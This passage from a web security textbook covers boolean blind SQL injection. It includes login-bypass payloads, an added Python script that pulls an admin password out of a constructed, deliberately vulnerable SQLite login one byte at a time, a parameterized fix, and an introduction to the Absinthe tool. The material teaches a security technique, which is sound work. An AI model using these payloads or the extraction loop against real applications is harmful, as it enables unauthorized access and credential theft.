The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws
Chapter 9: Injecting Code (page 277)

In the first case, the application will log you in as the admin user. In the second case, the login attempt will fail, because the 1=2 condition is always false.



You can leverage this control of the application's behavior as a means of inferring the truth or falsehood of arbitrary conditions within the database itself. For example, using the ASCII and SUBSTRING functions described previously, you can test whether a specific character of a captured string has a specific value. Submitting this piece of input will log you in as the admin user, because the condition tested is true (the ASCII code of 'A' is 65):

admin' AND ASCII(SUBSTRING('Admin',1,1)) = 65--

Submitting the following input, however, will result in a failed login, because the condition tested is false:

admin' AND ASCII(SUBSTRING('Admin',1,1)) = 66--

By submitting a large number of such queries, cycling through the range of likely ASCII codes for each character until a hit occurs, you can extract the entire string, one byte at a time. Two practical points: the function names are database-specific (ASCII and SUBSTRING on MS-SQL and MySQL, ASCII and SUBSTR on Oracle), and a binary search on the character code (ASCII(...) > 64, then > 96, and so on) recovers each byte in about seven requests rather than one request per candidate value.
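The extraction loop described above, as an added example that is not code from the book (nor from Absinthe, the tool discussed in the next section, which automates the same inference): a Python script that builds a constructed SQLite user table, a login query that is vulnerable in exactly the way the text describes, and a boolean oracle of the form admin' AND <condition>--, then recovers the admin password one byte at a time. Because it runs against SQLite, the conditions use unicode(substr(...)) in place of the ASCII(SUBSTRING(...)) of the payloads above; the table, the rows, the password 'S3cretPw' and all helper names are assumptions made here. It also goes beyond the text by showing the binary-search variant beside the linear scan, and a parameterized query against which the same payload fails.

```python
"""Boolean-based blind SQL injection, automated: recover a string one byte at a
time through a login form that reveals nothing but success or failure.

Constructed for illustration: the schema, the rows and vulnerable_login() stand
in for the target application. SQLite has no ASCII()/SUBSTRING(); the equivalent
unicode()/substr() are used, which also return NULL once past the string's end.
"""
import sqlite3


def build_db():
    """Constructed in-memory user store; the 'admin' password is the target."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "S3cretPw"), ("alice", "hunter2")])
    return conn


def vulnerable_login(conn, username, password):
    """The flaw under discussion: input is concatenated straight into the query.
    Returns True when a row matches, i.e. the application 'logs you in'."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def safe_login(conn, username, password):
    """The fix: bound parameters, so the quote in the payload is data, not syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


class Oracle:
    """Turns the login form into a one-bit oracle: inject admin' AND <cond>-- and
    read the answer from whether the login succeeds. Counts requests made."""

    def __init__(self, conn):
        self.conn = conn
        self.calls = 0

    def __call__(self, condition):
        self.calls += 1
        # The trailing -- comments out the password check, as in the book's payloads.
        return vulnerable_login(self.conn, "admin' AND " + condition + "--", "x")


def char_code_expr(expr, pos):
    """SQLite spelling of ASCII(SUBSTRING(expr, pos, 1)); NULL past the end."""
    return "unicode(substr((" + expr + "), " + str(pos) + ", 1))"


def extract_linear(oracle, expr, max_len=64):
    """The book's approach: cycle through the likely ASCII codes until one hits."""
    out = ""
    for pos in range(1, max_len + 1):
        code_expr = char_code_expr(expr, pos)
        hit = None
        for c in range(32, 127):          # printable ASCII, one request each
            if oracle(code_expr + " = " + str(c)):
                hit = c
                break
        if hit is None:                   # nothing matched: end of string
            break
        out += chr(hit)
    return out


def extract_binary(oracle, expr, max_len=64):
    """Same inference, but ~7 comparisons per byte (binary search on the code
    point) plus one confirming equality check, instead of up to 95."""
    out = ""
    for pos in range(1, max_len + 1):
        code_expr = char_code_expr(expr, pos)
        lo, hi = 32, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(code_expr + " > " + str(mid)):
                lo = mid + 1
            else:
                hi = mid
        # NULL (end of string) or a non-ASCII character fails the confirmation.
        if not oracle(code_expr + " = " + str(lo)):
            break
        out += chr(lo)
    return out


# Subquery whose result we cannot see directly, only infer bit by bit.
ADMIN_PASSWORD_QUERY = "SELECT password FROM users WHERE username = 'admin'"


def demo():
    """Returns (linear_result, linear_requests, binary_result, binary_requests)."""
    conn = build_db()
    o_lin = Oracle(conn)
    linear = extract_linear(o_lin, ADMIN_PASSWORD_QUERY)
    o_bin = Oracle(conn)
    binary = extract_binary(o_bin, ADMIN_PASSWORD_QUERY)
    return linear, o_lin.calls, binary, o_bin.calls


if __name__ == "__main__":
    print(demo())
```

demo() returns both recovered strings together with the number of oracle requests each strategy needed; for the eight-character constructed password the linear scan spends several hundred requests where the binary search spends 72. Against a real target every one of those requests is an HTTP round trip, which is why the per-byte cost, not the query syntax, dominates this attack.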

Absinthe

Performing this inference-based attack manually would be extremely tedious and time-consuming, requiring numerous requests for every single byte of retrieved data. Fortunately, there are various ways in which you can automate and parallelize the attack, to extract a large amount of information in a relatively short period of time. An excellent tool that you can use to perform this task is Absinthe. (Absinthe dates from the mid-2000s and is no longer actively maintained; sqlmap automates the same boolean-based inference technique today.)

Absinthe is not a point-and-click tool. To use it effectively, you need to fully understand the SQL injection flaw you are exploiting, and have reached the point where you can supply crafted input that affects the application's response in some detectable way.

The first step is to configure Absinthe with all the information required to perform the attack. This includes:

■ The URL and request method.

■ The type of database being targeted, so that Absinthe can retrieve the relevant meta-information once the attack is underway.

■ The parameters to the request, and whether each is injectable.

■ Any further options to fine-tune the attack. If necessary, Absinthe can append a specified string at the end of each injected payload and can add the comment character, to ensure that the resulting modified query is syntactically valid.

